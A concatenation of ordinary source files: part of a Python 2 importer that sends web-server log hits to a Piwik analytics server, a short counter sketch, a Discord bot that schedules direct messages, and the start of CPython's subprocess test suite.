= True t.start() logging.debug('Launched recorder') @classmethod def add_hits(cls, all_hits): """ Add a set of hits to the recorders queue. """ # Organize hits so that one client IP will always use the same queue. # We have to do this so visits from the same IP will be added in the right order. 
hits_by_client = [[] for r in cls.recorders] for hit in all_hits: hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit) for i, recorder in enumerate(cls.recorders): recorder.queue.put(hits_by_client[i]) @classmethod def wait_empty(cls): """ Wait until all recorders have an empty queue. """ for recorder in cls.recorders: recorder._wait_empty() def _run_bulk(self): while True: try: hits = self.queue.get() except: # TODO: we should log something here, however when this happens, logging.etc will throw return if len(hits) > 0: try: self._record_hits(hits) except Piwik.Error, e: fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error self.queue.task_done() def _run_single(self): while True: if config.options.force_one_action_interval != False: time.sleep(config.options.force_one_action_interval) if len(self.unrecorded_hits) > 0: hit = self.unrecorded_hits.pop(0) try: self._record_hits([hit]) except Piwik.Error, e: fatal_error(e, hit.filename, hit.lineno) else: self.unrecorded_hits = self.queue.get() self.queue.task_done() def _wait_empty(self): """ Wait until the queue is empty. """ while True: if self.queue.empty(): # We still have to wait for the last queue item being processed # (queue.empty() returns True before queue.task_done() is # called). self.queue.join() return time.sleep(1) def date_to_piwik(self, date): date, time = date.isoformat(sep=' ').split() return '%s %s' % (date, time.replace('-', ':')) def _get_hit_args(self, hit): """ Returns the args used in tracking a hit, without the token_auth. """ site_id, main_url = resolver.resolve(hit) if site_id is None: # This hit doesn't match any known Piwik site. if config.options.replay_tracking: stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite')) else: stats.piwik_sites_ignored.add(hit.host) stats.count_lines_no_site.increment() return stats.dates_recorded.add(hit.date.date()) path = hit.path if hit.query_string and not config.options.strip_query_string: path += config.options.query_string_delimiter + hit.query_string # only prepend main url / host if it's a path url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url url = (url_prefix if path.startswith('/') else '') + path[:1024] # handle custom variables before generating args dict if config.options.enable_bots: if hit.is_robot: hit.add_visit_custom_var("Bot", hit.user_agent) else: hit.add_visit_custom_var("Not-Bot", hit.user_agent) hit.add_page_custom_var("HTTP-code", hit.status) args = { 'rec': '1', 'apiv': '1', 'url': url.encode('utf8'), 'urlref': hit.referrer[:1024].encode('utf8'), 'cip': hit.ip, 'cdt': self.date_to_piwik(hit.date), 'idsite': site_id, 'dp': '0' if config.options.reverse_dns else '1', 'ua': hit.user_agent.encode('utf8') } if config.options.replay_tracking: # prevent request to be force recorded when option replay-tracking args['rec'] = '0' # idsite is already determined by resolver if 'idsite' in hit.args: del hit.args['idsite'] args.update(hit.args) if hit.is_download: args['download'] = args['url'] if config.options.enable_bots: args['bots'] = '1' if hit.is_error or hit.is_redirect: args['action_name'] = '%s%sURL = %s%s' % ( hit.status, config.options.title_category_delimiter, urllib.quote(args['url'], ''), ("%sFrom = %s" % ( config.options.title_category_delimiter, urllib.quote(args['urlref'], '') ) if args['urlref'] != '' else '') ) if hit.generation_time_milli > 0: args['gt_ms'] = int(hit.generation_time_milli) if hit.event_category and 
hit.event_action: args['e_c'] = hit.event_category args['e_a'] = hit.event_action if hit.event_name: args['e_n'] = hit.event_name if hit.length: args['bw_bytes'] = hit.length # convert custom variable args to JSON if 'cvar' in args and not isinstance(args['cvar'], basestring): args['cvar'] = json.dumps(args['cvar']) if '_cvar' in args and not isinstance(args['_cvar'], basestring): args['_cvar'] = json.dumps(args['_cvar']) return args def _get_host_with_protocol(self, host, main_url): if '://' not in host: parts = urlparse.urlparse(main_url) host = parts.scheme + '://' + host return host def _record_hits(self, hits): """ Inserts several hits into Piwik. """ if not config.options.dry_run: data = { 'token_auth': config.options.piwik_token_auth, 'requests': [self._get_hit_args(hit) for hit in hits] } try: args = {} if config.options.debug_tracker: args['debug'] = '1' response = piwik.call( '/piwik.php', args=args, expected_content=None, headers={'Content-type': 'application/json'}, data=data, on_failure=self._on_tracking_failure ) if config.options.debug_tracker: logging.debug('tracker response:\n%s' % response) # check for invalid requests try: response = json.loads(response) except: logging.info("bulk tracking returned invalid JSON") # don't display the tracker response if we're debugging the tracker. # debug tracker output will always break the normal JSON output. if not config.options.debug_tracker: logging.info("tracker response:\n%s" % response) response = {} if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and response['invalid_indices']): invalid_count = len(response['invalid_indices']) invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']] invalid_lines_str = ", ".join(invalid_lines) stats.invalid_lines.extend(invalid_lines) logging.info("The Piwik tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str)) elif 'invalid' in response and response['invalid'] > 0: logging.info("The Piwik tracker identified %s invalid requests." % response['invalid']) except Piwik.Error, e: # if the server returned 400 code, BulkTracking may not be enabled if e.code == 400: fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno) raise stats.count_lines_recorded.advance(len(hits)) def _is_json(self, result): try: json.loads(result) return True except ValueError, e: return False def _on_tracking_failure(self, response, data): """ Removes the successfully tracked hits from the request payload so they are not logged twice. """ try: response = json.loads(response) except: # the response should be in JSON, but in case it can't be parsed just try another attempt logging.debug("cannot parse tracker response, should be valid JSON") return response # remove the successfully tracked hits from payload tracked = response['tracked'] data['requests'] = data['requests'][tracked:] return response['message'] class Hit(object): """ It's a simple container. 
""" def __init__(self, **kwargs): for key, value in kwargs.iteritems(): setattr(self, key, value) super(Hit, self).__init__() if config.options.force_lowercase_path: self.full_path = self.full_path.lower() def get_visitor_id_hash(self): visitor_id = self.ip if config.options.replay_tracking: for param_name_to_use in ['uid', 'cid', '_id', 'cip']: if param_name_to_use in self.args: visitor_id = self.args[param_name_to_use] break return abs(hash(visitor_id)) def add_page_custom_var(self, key, value): """ Adds a page custom variable to this Hit. """ self._add_custom_var(key, value, 'cvar') def add_visit_custom_var(self, key, value): """ Adds a visit custom variable to this Hit. """ self._add_custom_var(key, value, '_cvar') def _add_custom_var(self, key, value, api_arg_name): if api_arg_name not in self.args: self.args[api_arg_name] = {} if isinstance(self.args[api_arg_name], basestring): logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value)) return index = len(self.args[api_arg_name]) + 1 self.args[api_arg_name][index] = [key, value] class Parser(object): """ The Parser parses the lines in a specified file and inserts them into a Queue. """ def __init__(self): self.check_methods = [method for name, method in inspect.getmembers(self, predicate=inspect.ismethod) if name.startswith('check_')] ## All check_* methods are called for each hit and must return True if the ## hit can be imported, False otherwise. def check_hostname(self, hit): # Check against config.hostnames. if not hasattr(hit, 'host') or not config.options.hostnames: return True # Accept the hostname only if it matches one pattern in the list. result = any( fnmatch.fnmatch(hit.host, pattern) for pattern in config.options.hostnames ) if not result: stats.count_lines_hostname_skipped.increment() return result def check_static(self, hit): if hit.extension in STATIC_EXTENSIONS: if config.options.enable_static: hit.is_download = True return True else: stats.count_lines_static.increment() return False return True def check_download(self, hit): if hit.extension in config.options.download_extensions: stats.count_lines_downloads.increment() hit.is_download = True return True # the file is not in the white-listed downloads # if it's a know download file, we shall skip it elif hit.extension in DOWNLOAD_EXTENSIONS: stats.count_lines_skipped_downloads.increment() return False return True def check_user_agent(self, hit): user_agent = hit.user_agent.lower() for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents): if s in user_agent: if config.options.enable_bots: hit.is_robot = True return True else: stats.count_lines_skipped_user_agent.increment() return False return True def check_http_error(self, hit): if hit.status[0] in ('4', '5'): if config.options.replay_tracking: # process error logs for replay tracking, since we don't care if piwik error-ed the first time return True elif config.options.enable_http_errors: hit.is_error = True return True else: stats.count_lines_skipped_http_errors.increment() return False return True def check_http_redirect(self, hit): if hit.status[0] == '3' and hit.status != '304': if config.options.enable_http_redirects: hit.is_redirect = True return True else: stats.count_lines_skipped_http_redirects.increment() return False return True def check_path(self, hit): for excluded_path in config.options.excluded_paths: if fnmatch.fnmatch(hit.path, excluded_path): return False # By default, all paths are included. 
if config.options.included_paths: for included_path in config.options.included_paths: if fnmatch.fnmatch(hit.path, included_path): return True return False return True @staticmethod def check_format(lineOrFile): format = False format_groups = 0 for name, candidate_format in FORMATS.iteritems(): logging.debug("Check format %s", name) match = None try: if isinstance(lineOrFile, basestring): match = candidate_format.check_format_line(lineOrFile) else: match = candidate_format.check_format(lineOrFile) except Exception, e: logging.debug('Error in format checking: %s', traceback.format_exc()) pass if match: logging.debug('Format %s matches', name) # compare format groups if this *BaseFormat has groups() method try: # if there's more info in this match, use this format match_groups = len(match.groups()) logging.debug('Format match contains %d groups' % match_groups) if format_groups < match_groups: format = candidate_format format_groups = match_groups except AttributeError: format = candidate_format else: logging.debug('Format %s does not match', name) # if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the # --w3c-time-taken-milli option isn't set if isinstance(format, W3cExtendedFormat): format.check_for_iis_option() return format @staticmethod def detect_format(file): """ Return the best matching format for this file, or None if none was found. """ logging.debug('Detecting the log format') format = False # check the format using the file (for formats like the W3cExtendedFormat one) format = Parser.check_format(file) # check the format using the first N lines (to avoid irregular ones) lineno = 0 limit = 100000 while not format and lineno < limit: line = file.readline() if not line: # if at eof, don't keep looping break lineno = lineno + 1 logging.debug("Detecting format against line %i" % lineno) format = Parser.check_format(line) try: file.seek(0) except IOError: pass if not format: fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit + "\nMaybe try specifying the format with the --log-format-name command line argument." ) return logging.debug('Format %s is the best match', format.name) return format def parse(self, filename): """ Parse the specified filename and insert hits in the queue. """ def invalid_line(line, reason): stats.count_lines_invalid.increment() if config.options.debug >= 2: logging.debug('Invalid line detected (%s): %s' % (reason, line)) if filename == '-': filename = '(stdin)' file = sys.stdin else: if not os.path.exists(filename): print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename return else: if filename.endswith('.bz2'): open_func = bz2.BZ2File elif filename.endswith('.gz'): open_func = gzip.open else: open_func = open file = open_func(filename, 'r') if config.options.show_progress: print 'Parsing log %s...' % filename if config.format: # The format was explicitely specified. format = config.format if isinstance(format, W3cExtendedFormat): format.create_regex(file) if format.regex is None: return fatal_error( "File is not in the correct format, is there a '#Fields:' line? " "If not, use the --w3c-fields option." ) else: # If the file is empty, don't bother. data = file.read(100) if len(data.strip()) == 0: return try: file.seek(0) except IOError: pass format = self.detect_format(file) if format is None: return fatal_error( 'Cannot guess the logs format. 
Please give one using ' 'either the --log-format-name or --log-format-regex option' ) # Make sure the format is compatible with the resolver. resolver.check_format(format) if config.options.dump_log_regex: logging.info("Using format '%s'." % format.name) if format.regex: logging.info("Regex being used: %s" % format.regex.pattern) else: logging.info("Format %s does not use a regex to parse log lines." % format.name) logging.info("--dump-log-regex option used, aborting log import.") os._exit(0) valid_lines_count = 0 hits = [] for lineno, line in enumerate(file): try: line = line.decode(config.options.encoding) except UnicodeDecodeError: invalid_line(line, 'invalid encoding') continue stats.count_lines_parsed.increment() if stats.count_lines_parsed.value <= config.options.skip: continue match = format.match(line) if not match: invalid_line(line, 'line did not match') continue valid_lines_count = valid_lines_count + 1 if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit: if len(hits) > 0: Recorder.add_hits(hits) logging.info("Exceeded limit specified in --debug-request-limit, exiting.") return hit = Hit( filename=filename, lineno=lineno, status=format.get('status'), full_path=format.get('path'), is_download=False, is_robot=False, is_error=False, is_redirect=False, args={}, ) if config.options.regex_group_to_page_cvars_map: self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True) if config.options.regex_group_to_visit_cvars_map: self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False) if config.options.regex_groups_to_ignore: format.remove_ignored_groups(config.options.regex_groups_to_ignore) try: hit.query_string = format.get('query_string') hit.path = hit.full_path except BaseFormatException: hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter) # W3cExtendedFormat detaults to - when there is no query string, but we want empty string if hit.query_string == '-': hit.query_string = '' hit.extension = hit.path.rsplit('.')[-1].lower() try: hit.referrer = format.get('referrer') if hit.referrer.startswith('"'): hit.referrer = hit.referrer[1:-1] except BaseFormatException: hit.referrer = '' if hit.referrer == '-': hit.referrer = '' try: hit.user_agent = format.get('user_agent') # in case a format parser included enclosing quotes, remove them so they are not # sent to Piwik if hit.user_agent.startswith('"'): hit.user_agent = hit.user_agent[1:-1] except BaseFormatException: hit.user_agent = '' hit.ip = format.get('ip') try: hit.length = int(format.get('length')) except (ValueError, BaseFormatException): # Some lines or formats don't have a length (e.g. 304 redirects, W3C logs) hit.length = 0 try: hit.generation_time_milli = float(format.get('generation_time_milli')) except BaseFormatException: try: hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000 except BaseFormatException: try: hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000 except BaseFormatException: hit.generation_time_milli = 0 if config.options.log_hostname: hit.host = config.options.log_hostname else: try: hit.host = format.get('host').lower().strip('.') if hit.host.startswith('"'): hit.host = hit.host[1:-1] except BaseFormatException: # Some formats have no host. 
pass # Add userid try: hit.userid = None userid = format.get('userid') if userid != '-': hit.args['uid'] = hit.userid = userid except: pass # add event info try: hit.event_category = hit.event_action = hit.event_name = None hit.event_category = format.get('event_category') hit.event_action = format.get('event_action') hit.event_name = format.get('event_name') if hit.event_name == '-': hit.event_name = None except: pass # Check if the hit must be excluded. if not all((method(hit) for method in self.check_methods)): continue # Parse date. # We parse it after calling check_methods as it's quite CPU hungry, and # we want to avoid that cost for excluded hits. date_string = format.get('date') try: hit.date = datetime.datetime.strptime(date_string, format.date_format) except ValueError, e: invalid_line(line, 'invalid date or invalid format: %s' % str(e)) continue # Parse timezone and substract its value from the date try: timezone = float(format.get('timezone')) except BaseFormatException: timezone = 0 except ValueError: invalid_line(line, 'invalid timezone') continue if timezone: hit.date -= datetime.timedelta(hours=timezone/100) if config.options.replay_tracking: # we need a query string and we only consider requests with piwik.php if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file): invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php') continue query_arguments = urlparse.parse_qs(hit.query_string) if not "idsite" in query_arguments: invalid_line(line, 'missing idsite') continue try: hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems()) except UnicodeDecodeError: invalid_line(line, 'invalid encoding') continue hits.append(hit) if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders): Recorder.add_hits(hits) hits = [] # add last chunk of hits if len(hits) > 0: Recorder.add_hits(hits) def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var): for group_name, custom_var_name in groups.iteritems(): if group_name in format.get_all(): value = format.get(group_name) # don't track the '-' empty placeholder value if value == '-': continue if is_page_var: hit.add_page_custom_var(custom_var_name, value) else: hit.add_visit_custom_var(custom_var_name, value) def main(): """ Start the importing process. """ stats.set_time_start() if config.options.show_progress: stats.start_monitor() recorders = Recorder.launch(config.options.recorders) try: for filename in config.filenames: parser.parse(filename) Recorder.wait_empty() except KeyboardInterrupt: pass stats.set_time_stop() if config.options.show_progress: stats.stop_monitor() stats.print_summary() def fatal_error(error, filename=None, lineno=None): print >> sys.stderr, 'Fatal error: %s' % error if filename and lineno is not None: print >> sys.stderr, ( 'You can restart the import of "%s" from the point it failed by ' 'specifying --skip=%d on the command line.\n' % (filename, lineno) ) os._exit(1) if __name__ == '__main__': try: piwik = Piwik() config = Configuration() stats = Statistics() resolver = config.get_resolver() parser = Parser() main() sys.exit(0) except KeyboardInterrupt: pass
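# --- Illustrative sketch (editorial addition, not part of the importer) --------
# Statistics.Counter above relies on itertools.count() for thread-safe increments
# without an explicit lock: the C-implemented iterator advances atomically under
# the GIL, so concurrent callers never see a skipped or repeated value.  Below is
# a minimal, self-contained Python 3 adaptation of that idea; AtomicCounter and
# _demo_worker are hypothetical names used only for this sketch.
import itertools
import threading

class AtomicCounter(object):
    """Counter that several threads may increment without taking a lock."""

    def __init__(self):
        self._counter = itertools.count(1)
        self.value = 0

    def increment(self):
        # next() on the C-level counter is atomic with respect to the GIL.
        self.value = next(self._counter)

def _demo_worker(counter, n):
    for _ in range(n):
        counter.increment()

if __name__ == '__main__':
    demo = AtomicCounter()
    workers = [threading.Thread(target=_demo_worker, args=(demo, 10000))
               for _ in range(4)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    # The underlying sequence reached 40000; demo.value holds the snapshot
    # written by whichever thread assigned last (normally 40000 as well).
    print(demo.value)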
main.py
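# Editorial overview (added; not part of the original file): this module runs a
# Discord bot that schedules messages.  on_message() parses the "!sch" command,
# insertNewMessage() from db_manage queues the parsed message, trackTime() polls
# once per second in a background thread and dispatches the custom 'sendDMs'
# event when the earliest queued message is due, and on_sendDMs() delivers the
# direct messages (plus attachments) and records the send via registMessage().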
''' __author__ = "Rodrigo Sobral" __copyright__ = "Copyright 2021, Rodrigo Sobral" __credits__ = ["Rodrigo Sobral"] __license__ = "MIT" __version__ = "1.0.1" __maintainer__ = "Rodrigo Sobral" __email__ = "rodrigosobral@sapo.pt" __status__ = "Beta" ''' import discord, datetime from dotenv import load_dotenv from keep_alive import keep_alive from db_manage import insertNewMessage, message_db, getMostRecentMessageTime, logSentMessage from os import getenv from threading import Thread from time import sleep def defineBotIntents(): intents = discord.Intents.default() intents.members = True return intents client = discord.Client(command_prefix='!', intents=defineBotIntents(), help_command='!sch help') wait_flag= False # ================================================================================ @client.event async def on_ready(): print('We have logged in as {0.user}'.format(client)) @client.event async def on_message(command: discord.Message): if command.author.bot: return # Ask for help showing all the commands available if command.content=='!sch help': await command.channel.send(':clipboard: Here\'s a list of the current commands:\n`!sch <message> <target?> | <hours> <date?>`\n\nExample: ```!sch Have a good dinner John and Harry! @John @Harry | 20:21 19/07/2021\nor\n!sch Good morning guys! | 08:00```\n') # Schedule a message to be sent elif command.content.startswith('!sch'): command.content= command.content[4:] tagged_users=[] if command.content.find('<@!')==-1 or command.mention_everyone: [tagged_users.append(member) for member in command.channel.members if not member.bot] else: [tagged_users.append(member) for member in command.mentions if not member.bot] # Get Deliver Time from message if command.content.count('|')!=1: return await command.channel.send(':warning: Invalid command format.\nExample: ```!sch Have a good dinner John and Harry! @John @Harry | 20:21 19/07/2021```\n') inputed_date= command.content[command.content.find(' | ')+3:] # If the date is not given, use the current date deliver_date= getHoursAndDate(inputed_date) if not deliver_date: deliver_date=getOnlyHours(inputed_date) if not deliver_date: return await command.channel.send(':warning: Invalid deliver time format.\nExample: ```!sch Have a good dinner John and Harry! 
@John @Harry | 20:21 19/07/2021```\n') del inputed_date # Get Attachments from message attachments= await getAttachmentsFromMessage(command.attachments) # Clear date and hours from message command.content= clearString(command.content[:command.content.find(' | ')]) if not command.content and len(attachments)==0: return await command.channel.send(':warning: You must send any type of information (text or files)\n') message_container= { 'channel_name': command.channel.name, 'sender': command.author, 'receivers': tagged_users, 'content': command.content, 'deliver_date': deliver_date, 'attachments': attachments } # Stores the new message to the queue try: insertNewMessage(message_container) except Exception as e: return await command.channel.send(str(e)) return await command.channel.send(':white_check_mark: Your message \'{}\' (containing {} attachments) will be sent to{} at '.format(message_container['content'], len(attachments), printUsersTag(message_container['receivers'])) + deliver_date.strftime("%H:%M:%S, %d/%m/%Y")) # Event triggered by TrackTime to send direct messages to the tagged users @client.event async def on_sendDMs(): global wait_flag for receiver in message_db[0]['receivers']: await receiver.send('{} sent you a message (with {} attachments): {}'.format(printUserTag(message_db[0]['sender']), len(message_db[0]['attachments']), message_db[0]['content'])) [await receiver.send(file=attachment) for attachment in message_db[0]['attachments']] registMessage(message_db[0]) message_db.pop(0) wait_flag= False # ================================================================================ # Clear all the not necessary spaces until the string is cleared or empty def clearString(string: str): id_index= string.find('<@!') if id_index!=-1: string= string[:id_index] while string and string[0].isspace(): string= string[1:] while string and string[-1].isspace(): string= string[:-1] return string # When the command only indicates hours (the date is, by default, today's date) def getOnlyHours(inputed_date:str): today= datetime.datetime.now() try: hour= datetime.datetime.strptime(inputed_date, '%H:%M:%S') except: try: hour= datetime.datetime.strptime(inputed_date, '%H:%M') except: return None return today.replace(hour=hour.hour, minute=hour.minute, second=hour.second, microsecond=0) # When the command indicates hours and a date to the message be delivered def getHoursAndDate(inpute_date: str): if inpute_date.find(' ')==-1: return None try: date= datetime.datetime.strptime(inpute_date, '%H:%M:%S %d/%m/%Y') except: try: date= datetime.datetime.strptime(inpute_date, '%H:%M %d/%m/%Y') except: return None return date # Get the list of attachments from the command and returns a list of discord.Files async def getAttachmentsFromMessage(attachments_list: list) -> discord.File: if len(attachments_list)==0: return [] files= [] for attachment in attachments_list: new_file= await discord.Attachment.to_file(attachment) files.append(discord.File(new_file.fp, filename=new_file.filename)) return files def printUserTag(user: discord.User): return '<@!'+str(user.id)+'>' def printUsersTag(users: list): text_format= '' for user in users: text_format+= ' <@!'+str(user.id)+'>' return text_format def printUserName(user: discord.User): return str(user.name) def printUsersName(users: list): text_format= '' for user in users: text_format+= ' '+str(user.name) return text_format # Sends a formatted log of a sent message to logSentMessage(), in db_manage.py def registMessage(message_container: dict): logSentMessage('{}: {} 
[{}] ->{} | '.format(message_db[0]['channel_name'], printUserName(message_db[0]['sender']), len(message_db[0]['attachments']), printUsersName(message_container['receivers'])) + message_container['deliver_date'].strftime("%H:%M:%S, %d/%m/%Y")) # We keep tracking current time to send messages in real time def trackTime(): global wait_flag print('Tracking Time...') while True: now = datetime.datetime.now().replace(microsecond=0) first_message_time= getMostRecentMessageTime() if not wait_flag and first_message_time and first_message_time <= now: client.dispatch('sendDMs') wait_flag= True sleep(1) # ================================================================================ def runClient(): client.run(getenv('SCHEDULING_BOT_TOKEN')) if __name__ == "__main__": load_dotenv() Thread(target=runClient).start() Thread(target=trackTime).start() keep_alive()
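# --- Illustrative sketch (editorial addition, not part of the bot) -------------
# getOnlyHours() and getHoursAndDate() above accept "HH:MM[:SS]", optionally
# followed by "DD/MM/YYYY".  The helper below is a compact, hypothetical
# equivalent of that same fallback chain, shown only to make the accepted
# formats explicit; the bot itself keeps the two functions separate.
import datetime

def parse_deliver_time(text: str):
    """Return a datetime for the '!sch' time argument, or None if it is invalid."""
    # Full "time date" forms first, mirroring the order used in on_message().
    for fmt in ('%H:%M:%S %d/%m/%Y', '%H:%M %d/%m/%Y'):
        try:
            return datetime.datetime.strptime(text, fmt)
        except ValueError:
            pass
    # Time-only forms fall back to today's date.
    today = datetime.datetime.now()
    for fmt in ('%H:%M:%S', '%H:%M'):
        try:
            hour = datetime.datetime.strptime(text, fmt)
            return today.replace(hour=hour.hour, minute=hour.minute,
                                 second=hour.second, microsecond=0)
        except ValueError:
            pass
    return None

# parse_deliver_time('20:21 19/07/2021')  -> 2021-07-19 20:21:00
# parse_deliver_time('08:00')             -> today at 08:00:00
# parse_deliver_time('not a time')        -> None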
test_subprocess.py
import unittest from test import script_helper from test import support import subprocess import sys import signal import io import locale import os import errno import tempfile import time import re import selectors import sysconfig import warnings import select import shutil import gc import textwrap try: import threading except ImportError: threading = None mswindows = (sys.platform == "win32") # # Depends on the following external programs: Python # if mswindows: SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), ' 'os.O_BINARY);') else: SETBINARY = '' try: mkstemp = tempfile.mkstemp except AttributeError: # tempfile.mkstemp is not available def mkstemp(): """Replacement for mkstemp, calling mktemp.""" fname = tempfile.mktemp() return os.open(fname, os.O_RDWR|os.O_CREAT), fname class BaseTestCase(unittest.TestCase): def setUp(self): # Try to minimize the number of children we have so this test # doesn't crash on some buildbots (Alphas in particular). support.reap_children() def tearDown(self): for inst in subprocess._active: inst.wait() subprocess._cleanup() self.assertFalse(subprocess._active, "subprocess._active not empty") def assertStderrEqual(self, stderr, expected, msg=None): # In a debug build, stuff like "[6580 refs]" is printed to stderr at # shutdown time. That frustrates tests trying to check stderr produced # from a spawned Python process. actual = support.strip_python_stderr(stderr) # strip_python_stderr also strips whitespace, so we do too. expected = expected.strip() self.assertEqual(actual, expected, msg) class PopenTestException(Exception): pass class PopenExecuteChildRaises(subprocess.Popen): """Popen subclass for testing cleanup of subprocess.PIPE filehandles when _execute_child fails. """ def _execute_child(self, *args, **kwargs): raise PopenTestException("Forced Exception for Test") class ProcessTestCase(BaseTestCase): def test_io_buffered_by_default(self): p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) try: self.assertIsInstance(p.stdin, io.BufferedIOBase) self.assertIsInstance(p.stdout, io.BufferedIOBase) self.assertIsInstance(p.stderr, io.BufferedIOBase) finally: p.stdin.close() p.stdout.close() p.stderr.close() p.wait() def test_io_unbuffered_works(self): p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0) try: self.assertIsInstance(p.stdin, io.RawIOBase) self.assertIsInstance(p.stdout, io.RawIOBase) self.assertIsInstance(p.stderr, io.RawIOBase) finally: p.stdin.close() p.stdout.close() p.stderr.close() p.wait() def test_call_seq(self): # call() function with sequence argument rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(rc, 47) def test_call_timeout(self): # call() function with timeout argument; we want to test that the child # process gets killed when the timeout expires. If the child isn't # killed, this call will deadlock since subprocess.call waits for the # child. 
self.assertRaises(subprocess.TimeoutExpired, subprocess.call, [sys.executable, "-c", "while True: pass"], timeout=0.1) def test_check_call_zero(self): # check_call() function with zero return code rc = subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(0)"]) self.assertEqual(rc, 0) def test_check_call_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(c.exception.returncode, 47) def test_check_output(self): # check_output() function with zero return code output = subprocess.check_output( [sys.executable, "-c", "print('BDFL')"]) self.assertIn(b'BDFL', output) def test_check_output_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_output( [sys.executable, "-c", "import sys; sys.exit(5)"]) self.assertEqual(c.exception.returncode, 5) def test_check_output_stderr(self): # check_output() function stderr redirected to stdout output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"], stderr=subprocess.STDOUT) self.assertIn(b'BDFL', output) def test_check_output_stdin_arg(self): # check_output() can be called with stdin set to a file tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b'pear') tf.seek(0) output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read().upper())"], stdin=tf) self.assertIn(b'PEAR', output) def test_check_output_input_arg(self): # check_output() can be called with input set to a string output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read().upper())"], input=b'pear') self.assertIn(b'PEAR', output) def test_check_output_stdout_arg(self): # check_output() refuses to accept 'stdout' argument with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print('will not be run')"], stdout=sys.stdout) self.fail("Expected ValueError when stdout arg supplied.") self.assertIn('stdout', c.exception.args[0]) def test_check_output_stdin_with_input_arg(self): # check_output() refuses to accept 'stdin' with 'input' tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b'pear') tf.seek(0) with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print('will not be run')"], stdin=tf, input=b'hare') self.fail("Expected ValueError when stdin and input args supplied.") self.assertIn('stdin', c.exception.args[0]) self.assertIn('input', c.exception.args[0]) def test_check_output_timeout(self): # check_output() function with timeout arg with self.assertRaises(subprocess.TimeoutExpired) as c: output = subprocess.check_output( [sys.executable, "-c", "import sys, time\n" "sys.stdout.write('BDFL')\n" "sys.stdout.flush()\n" "time.sleep(3600)"], # Some heavily loaded buildbots (sparc Debian 3.x) require # this much time to start and print. 
timeout=3) self.fail("Expected TimeoutExpired.") self.assertEqual(c.exception.output, b'BDFL') def test_call_kwargs(self): # call() function with keyword args newenv = os.environ.copy() newenv["FRUIT"] = "banana" rc = subprocess.call([sys.executable, "-c", 'import sys, os;' 'sys.exit(os.getenv("FRUIT")=="banana")'], env=newenv) self.assertEqual(rc, 1) def test_invalid_args(self): # Popen() called with invalid arguments should raise TypeError # but Popen.__del__ should not complain (issue #12085) with support.captured_stderr() as s: self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1) argcount = subprocess.Popen.__init__.__code__.co_argcount too_many_args = [0] * (argcount + 1) self.assertRaises(TypeError, subprocess.Popen, *too_many_args) self.assertEqual(s.getvalue(), '') def test_stdin_none(self): # .stdin is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print("banana")'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) p.wait() self.assertEqual(p.stdin, None) def test_stdout_none(self): # .stdout is None when not redirected, and the child's stdout will # be inherited from the parent. In order to test this we run a # subprocess in a subprocess: # this_test # \-- subprocess created by this test (parent) # \-- subprocess created by the parent subprocess (child) # The parent doesn't specify stdout, so the child will use the # parent's stdout. This test checks that the message printed by the # child goes to the parent stdout. The parent also checks that the # child's stdout is None. See #11963. code = ('import sys; from subprocess import Popen, PIPE;' 'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],' ' stdin=PIPE, stderr=PIPE);' 'p.wait(); assert p.stdout is None;') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) 